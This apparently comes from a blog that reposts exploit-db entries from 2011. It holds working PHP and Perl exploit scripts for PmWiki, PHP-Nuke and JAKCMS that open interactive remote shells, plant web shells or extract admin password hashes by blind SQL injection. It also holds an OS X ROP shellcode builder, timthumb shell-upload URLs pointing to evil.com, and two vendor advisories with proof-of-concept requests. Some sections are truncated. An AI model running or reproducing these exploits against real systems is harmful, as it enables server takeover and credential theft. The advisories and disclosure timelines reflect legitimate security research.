exploit | AppUnix

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

23/11/2011 little_oak Comments 0 Comment

<?php

/*

-------------------------------------------------------------

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

-------------------------------------------------------------

author...............: Egidio Romano aka EgiX

mail.................: n0b0d13s[at]gmail[dot]com

software link........: http://www.pmwiki.org/

affected versions....: from 2.0.0 to 2.2.34

+-------------------------------------------------------------------------+

| This proof of concept code was written for educational purpose only. |

| Use it at your own risk. Author will be not responsible for any damage. |

+-------------------------------------------------------------------------+

[-] vulnerable code in PageListSort() function defined into /scripts/pagelist.php

452. $code = '';

453. foreach($opt['=order'] as $o => $r) {

454. if (@$PageListSortCmp[$o])

455. $code .= "\$c = {$PageListSortCmp[$o]}; ";

456. else

457. $code .= "\$c = @strcasecmp(\$PCache[\$x]['$o'],\$PCache[\$y]['$o']); ";

458. $code .= "if (\$c) return $r\$c;\n";

459. }

460. StopWatch('PageListSort sort');

461. if ($code)

462. uasort($list,

463. create_function('$x,$y', "global \$PCache; $code return 0;"));

464. StopWatch('PageListSort end');

Input passed through 'order' parameter of 'pagelist' directive isn't properly sanitized before being used

in a call to create_function() at line 463. This can be exploited to inject and execute arbitrary PHP code.

Successful exploitation of this vulnerability might require authentication if the wiki isn't public writable.

[-] Disclosure timeline:

[09/11/2011] - Vulnerability discovered

[11/11/2011] - Issue reported to http://www.pmwiki.org/wiki/PITS/01271

[11/11/2011] - Version 2.2.35 released: http://www.pmwiki.org/wiki/PmWiki/ChangeLog#v2235

[12/11/2011] - CVE number requested

[15/11/2011] - Assigned CVE-2011-4453

[23/11/2011] - Public disclosure

*/

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

function http_send($host, $packet)

{

if (!($sock = fsockopen($host, 80)))

die("\n[-] No response from {$host}:80\n");

fputs($sock, $packet);

return stream_get_contents($sock);

}

print "\n+------------------------------------------------------------+";

print "\n| PmWiki <= 2.2.34 Remote PHP Code Injection Exploit by EgiX |";

print "\n+------------------------------------------------------------+\n";

if ($argc < 3)

{

print "\nUsage......: php $argv[0] <host> <path>\n";

print "\nExample....: php $argv[0] localhost /";

print "\nExample....: php $argv[0] localhost /pmwiki/\n";

die();

}

$host = $argv[1];

$path = $argv[2];

$phpcode = "']);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD]));print(___);die;#";

$payload = "action=edit&post=save&n=Cmd.Shell&text=(:pagelist order={$phpcode}:)";

$packet = "POST {$path}pmwiki.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

if (!preg_match("/Location/", http_send($host, $packet))) die("\n[-] Edit password required?!\n");

$packet = "POST {$path}pmwiki.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Content-Length: 11\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\nn=Cmd.Shell";

while(1)

{

print "\npmwiki-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

$response = http_send($host, sprintf($packet, base64_encode($cmd)));

preg_match("/\n\r\n(.*)___/s", $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}

?>

Fonte: http://www.exploit-db.com/exploits/18149/

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

23/11/2011 little_oak Comments 0 Comment

#!/usr/bin/perl

# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection

# Date: 2010.07.04 after 50 days the bug was discovered.

# Author/s: Dante90, WaRWolFz Crew

# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,

# Shades Master, V1R5, yeat

# Special Greetings To: The:Paradox

# Greetings To: Shotokan-The Hacker, _mRkZ_, h473

# Web Site: www.warwolfz.org

# My Wagend (Dante90): dante90wwz.altervista.org

# ----

# Why have I decided to publish this?

# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published

# my own exploit, with their names.

# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE

# ----

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Cookies;

use HTTP::Headers;

use Time::HiRes;

my $Victime = shift or &usage;

my $Hash = "";

my ($Referer,$Time,$Response);

my ($Start,$End);

my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');

my $Cookies = new HTTP::Cookies;

my $UserAgent = new LWP::UserAgent(

agent => 'Mozilla/5.0',

max_redirect => 0,

cookie_jar => $Cookies,

default_headers => HTTP::Headers->new,

) or die $!;

my $WaRWolFz = "http://www.warwolfz.org/";

my $DefaultTime = request($WaRWolFz);

my $Post;

sub Blind_SQL_Jnjection {

my ($dec,$hex,$Victime) = @_;

return

"http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}"

;

}

for(my $I=1; $I<=32; $I++){ #N Hash characters

for(my $J=0; $J<=15; $J++){ #0 -> F

$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);

$Time = request($Post);

sleep(3);

refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);

if ($Time > 4) {

$Time = request($Post);

refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);

if ($Time > 4) {

syswrite(STDOUT,chr($chars[$J]));

$Hash .= chr($chars[$J]);

$Time = request($Post);

refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);

last;

}

if($I == 1 && length $Hash < 1 && !$Hash){

print " * Exploit Failed *\n";

print " -------------------------------------------------------- \n";

exit;

}

if($I == 32){

print " * Exploit Successfully Executed *\n";

print " -------------------------------------------------------- \n";

system("pause");

}

sub request{

$Post = $_[0];

$Start = Time::HiRes::time();

my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {

title => "Dante90",

url => $Post,

description => "WaRWolFz Crew",

auth_name => "Dante90",

email => "dante90.dmc4\@hotmail.it",

filesize => "1024",

version => "1",

homepage => "http://www.warwolfz.org/",

d_op => "Add"

},

Referer => $HostName.'modules.php?name=Downloads&d_op=Add');

$Response->is_success() or die "$HostName : ", $Response->message, "\n";

$End = Time::HiRes::time();

$Time = $End - $Start;

return $Time;

}

sub usage {

system("cls");

{

print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";

print " -------------------------------------------------------- \n";

print " * USAGE: *\n";

print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";

print " * perl name_exploit.pl [victime] *\n";

print " -------------------------------------------------------- \n";

print " * Powered By Dante90, WaRWolFz Crew *\n";

print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

print " ------------------------------------------------------- \n";

};

exit;

}

sub refresh {

system("cls");

{

print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";

print " -------------------------------------------------------- \n";

print " * USAGE: *\n";

print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";

print " * perl name_exploit.pl [victime] *\n";

print " -------------------------------------------------------- \n";

print " * Powered By Dante90, WaRWolFz Crew *\n";

print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

print " ------------------------------------------------------- \n";

};

print " * Victime Site: " . $_[0] . "\n";

print " * Default Time: " . $_[1] . " seconds\n";

print " * BruteForcing Hash: " . chr($_[2]) . "\n";

print " * BruteForcing N Char Hash: " . $_[5] . "\n";

print " * SQL Time: " . $_[4] . " seconds\n";

print " * Hash: " . $_[3] . "\n";

}

#WaRWolFz Crew

Fonte: http://www.exploit-db.com/exploits/18148/

WordPress jetpack plugin SQL Injection Vulnerability

21/11/2011 little_oak Comments 0 Comment

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability

# Date: 2011-19-11

# Author: longrifle0x

# software: WordPress

# Download:http://wordpress.org/extend/plugins/jetpack/

# Tools: SQLMAP

######################################################

*DESCRIPTION

Discovered a vulnerability in jetpack, WordPress Plugin,

vulnerability is SQL injection.

File:wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

Fonte: http://www.exploit-db.com/exploits/18126/

OSX universal ROP shellcode Testado no SNOW LEOPARD

03/10/2011 little_oak Comments 0 Comment

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in x64_shellcode.asm ; - make ; - ./sc ; ; if you want to test: ; - uncomment lea rsp, [rel rop_stage0] / ret ; - make ; - nc -l 4444 ; - ./sc ; - you should get a shell over nc ; ; see my blog, if you want to know how this works: ; http://gdtr.wordpress.com ; ; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com). ; ; pa_kt ; twitter.com/pa_kt

extern _printf

global _main

;————————————————–
;- DATA
;————————————————–
section .data

rw_area equ 0x00007FFF5FC50000
rwx_area equ rw_area+0x1000
vm_prot equ 0x00007FFF5FC0D356
fake_stack equ rw_area+0x2000
fake_frame equ fake_stack+0x100
r12_zero equ rw_area-0x1000

rax_off equ rw_area-8
rbx_off equ rw_area+8-8
rcx_off equ rw_area+0x10-8
rdx_off equ rw_area+0x18-8
rsi_off equ rw_area+0x28-8
rbp_off equ rw_area+0x30-8
rsp_off equ rw_area+0x38-8
r8_off equ rw_area+0x40-8
r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC
pop_rbx equ 0x00007FFF5FC23373
store_reg equ 0x00007FFF5FC24CE1
set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7
c_size equ 0x1000
c_addr equ rwx_area
c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area
; size = 0x1000
stub:
lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]
xor rcx, rcx
inc rcx
shl rcx, 12 ;rcx = 0x1000
lea rdi, [rel normal_shellcode]
rep movsb
;int 3
normal_shellcode:

stub_size equ $-stub

; order is important
rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,
dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,
dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,
dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,
dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,
dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,
dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack
dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)
dq pop_rdi, fake_frame-8-0x38, store_reg,
saved_rsp:
dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre
saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot
dq pop_rdi, rw_area, set_regs
; marker
; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin “x64_shellcode”
x64_shellcode_size equ $-x64_shellcode

hello db “test”, 0
fmt db “\x%02x”,0

section .bss

rop_stage0 resq 100
copy_stub resq ((stub_size+7)/8)*5
copy_stub_size equ $-copy_stub

;————————————————–
;- CODE
;————————————————–
section .text

prep_stub:

mov rcx, (stub_size+7)/8
mov rsi, stub
mov rdi, copy_stub
mov rbx, rwx_area-8
go:
mov rax, pop_rdi
stosq
mov rax, rbx
stosq
mov rax, pop_rbx
stosq
movsq
mov rax, store_reg
stosq
add rbx, 8
loop go
ret

make_stage0:
mov rsi, rop_pre
mov rdi, rop_stage0
mov rcx, rop_pre_size
rep movsb

mov rsi, copy_stub
mov rcx, copy_stub_size
rep movsb

mov rsi, rop_post
mov rcx, rop_post_size
rep movsb

mov rsi, x64_shellcode
mov rcx, x64_shellcode_size
rep movsb

ret

print_it:
push rbp
mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size
lea rsi, [rel rop_stage0]
xor rax, rax
one_char:
lodsb
push rsi
push rcx
mov rsi, rax
mov rdi, qword fmt
xor rax, rax
call _printf
pop rcx
pop rsi
loop one_char

leave
ret

_main:
push qword rbp
mov rbp, rsp

call prep_stub
call make_stage0

call print_it

;lea rsp, [rel rop_stage0]
;ret

leave
ret

Fonte: http://www.exploit-db.com/exploits/17564/

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 little_oak Comments 3 comments

Sense of Security - Security Advisory - SOS-11-011


Release Date. 20-Sep-2011

Last Update. -

Vendor Notification Date. 22-Mar-2011

Product. NETGEAR Wireless Cable Modem Gateway

CG814WG

Affected versions. Hardware 1.03,

Software V3.9.26 R14 verified,

possibly others

Severity Rating. High

Impact. Authentication bypass,

Cross Site Request Forgery

Attack Vector. Remote without authentication

Solution Status. Upgrade to R15 (by contacting NETGEAR)

CVE reference. Not yet assigned
Details.

The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's

as customer premises equipment within Australia and abroad. It is a

centrally managed ISP solution whereby each ISP's devices run a

customised firmware and configuration changes and updates can be pushed

out as required.
Basic authentication is used as the primary and only authentication

mechanism for the administrator interface on the device. The basic

authentication can be bypassed by sending a valid POST request to the

device without sending any authentication header. The response from the

device sends the user to another page that requests basic

authentication, however at this point the request has already been

processed.
An example of attacks using the basic authentication bypass may include

changing the admin password or enabling the remote admin interface

(Internet facing).
Additionally, due to the lack of CSRF protection in the web application,

the bypass attack can be coupled with CSRF to have a victim enable the

remote admin interface to the Internet, where an attacker can then use

the bypass attack again across the remote admin interface to reset the

admin password and access the device. This attack is possible when

targeting a victim that is behind the NETGEAR device on the same segment

as the web administrator interface whom has browsed to a malicious site

containing the CSRF attack.
NETGEAR was notified of this vulnerability on 22 March 2011, but we

never received a response or acknowledgement of the issue or fix. Sense

of Security notified local ISP's and it was escalated by a local ISP

who worked with NETGEAR to develop and test an update. Sense of Security

was never provided an opportunity to validate the fixes in the latest

firmware version. Given the severity of the issue it would be prudent

for NETGEAR to notify and supply an update to all of its customers.
Proof of Concept.

By embedding the below HTML in a website and having a

victim browse to the website the remote management interface to the

Internet would be enabled. An attacker could then use one of the

hardcoded passwords for the device to access it, or use a basic

authentication bypass to change the admin password. Alternatively, the

attacker could conduct a CSRF attack that implements two POST requests

to have the remote admin interface enabled, and the admin password

changed.
The example here is a basic proof of concept, more complex examples

which include JavaScript redirects to mask the basic authentication

pop-up would be more stealthy.

















Solution.

Ask your ISP to obtain the latest firmware from NETGEAR and deploy it

to your device.
Discovered by.

Sense of Security Labs.
About us.

Sense of Security is a leading provider of information

security and risk management solutions. Our team has expert

skills in assessment and assurance, strategy and architecture,

and deployment through to ongoing management. We are

Australia's premier application penetration testing firm and

trusted IT security advisor to many of the country's largest

organisations.
Sense of Security Pty Ltd

Level 8, 66 King St

Sydney NSW 2000

AUSTRALIA
T: +61 (0)2 9290 4444

F: +61 (0)2 9290 4455

W: http://www.senseofsecurity.com.au

E: [email protected]

Twitter: @ITsecurityAU
The latest version of this advisory can be found at:

http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17874/

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 little_oak Comments 0 Comment

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 \n";


 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /jakcms/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);
$sid = $m[1];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= "< ?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));
$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
 print "\njakcms-shell# ";
 if (($cmd = trim(fgets(STDIN))) == "exit") break;
 preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

Fonte: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 little_oak Comments 3 comments

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)


---

Description

---

The following WordPress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled

domain such as blogger.com.evil.com and then providing it to the script through the

src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery

# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/

# Version: 0.1.1
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/auto-attachments

# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/

# Version: 0.2.9
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/wp-marketplace

# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/

# Version: 1.1.0
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/dp-thumbnail

# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/

# Version: 1.0
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/vk-gallery

# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/

# Version: 1.1.0
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/rekt-slideshow

# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/

# Version: 1.0.5
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/cac-featured-content

# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/

# Version: 0.8
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/rent-a-car

# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/

# Version: 1.0

---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider

# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/

# Version: 1.0
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/islidex

# Software Link: http://wordpress.org/extend/plugins/islidex/download/

# Version: 2.7
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/kino-gallery

# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/

# Version: 1.0
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/cms-pack

# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/

# Version: 1.3
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/a-gallery

# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/

# Version: 0.9
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page

# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/

# Version: 0.9
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/really-easy-slider

# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/

# Version: 0.1
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/verve-meta-boxes

# Date: 09/19/2011

# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/

# Version: 1.2.8
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar WordPress plugin shell upload vulnerability

# Google Dork: inurl:wp-content/plugins/user-avatar

# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/

# Version: 1.3.7
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability

# Google Dork: inurl:wp-content/plugins/extend-wordpress

# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/

# Version: 1.3.7
---

PoC

---

http://SERVER/db_unx_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Fonte: http://www.exploit-db.com/exploits/17872/

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 little_oak Comments 0 Comment

Sense of Security - Security Advisory - SOS-11-010


Release Date. 19-Sep-2011

Last Update. -

Vendor Notification Date. 21-Feb-2011

Product. Cisco TelePresence Series

Platform. Cisco

Affected versions. C < = TC4.1.2, MXP <= F9.1
Severity Rating. Low - Medium
Impact. Cookie/credential theft,
impersonation,
loss of confidentiality,
client-side code execution,
denial of service.
Solution Status. Vendor patch
References. 1. CVE-2011-2544 (CSCtq46488)
2. CVE-2011-2543 (CSCtq46496)
3. CVE-2011-2577 (CSCtq46500)
Details.
Cisco TelePresence is an umbrella term for Video Conferencing Hardware
and Software, Infrastructure and Endpoints. The C & MXP Series are the
Endpoints used on desks or in boardrooms to provide users with a
termination point for Video Conferencing.
1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488):
Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for
managing, configuring and reporting. It is possible to set the Call ID
(with H.323 or SIP) to a HTML value. If a call is made to another
endpoint and an authenticated user browses to the web interface on the
endpoint receiving the call (e.g. to view call statistics), the
HTML will render locally within the context of the logged in user. From
this point it is possible to make changes to the system as the
authenticated user. The flaw is due to the flexibility of the H.323 ID
or SIP Display Name fields and failure to correctly validate user input.
Examples (MXP):
Rebooting the system: 

The attacker may also choose to change passwords in the system, disable

encryption or enable telnet:




2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):

Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for

setting and getting configuration.
Example syntax is:

http://ip/getxml?location=/Configuration/Video

The request is sent to a locally listening shell (tshell). This is the

case for all requests relating to performing an action on the system (e.g.

config get or set). The shell then sends the input to the "main"

application (/app/main, id=0), and the data is passed as a parameter.
It was discovered that the getXML handle does not properly perform

length checking on the user supplied input before passing it to the

tshell. Furthermore, there is no length checking performed in the tshell

and no bounds checking performed in the main application where the

parameter is consumed. As such, it is possible to send input that

exceeds the size of the receiving buffer, subsequently causing an

invalid address to be read. This causes a reboot on the Endpoints. The

VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but

it will restart the process itself which drops all calls.
Proof of Concept: GET

/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n

Host: 192.168.6.99\r\n\r\n"
Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670

Illegal memory access at: 0x5858585c

Registers:

GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037

0f315580

GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896

0000000b

GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005

00000002

GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac

129e5960

GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac

129e5960

NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002
As you can see, the crash string is passed as a parameter in GPR 8.

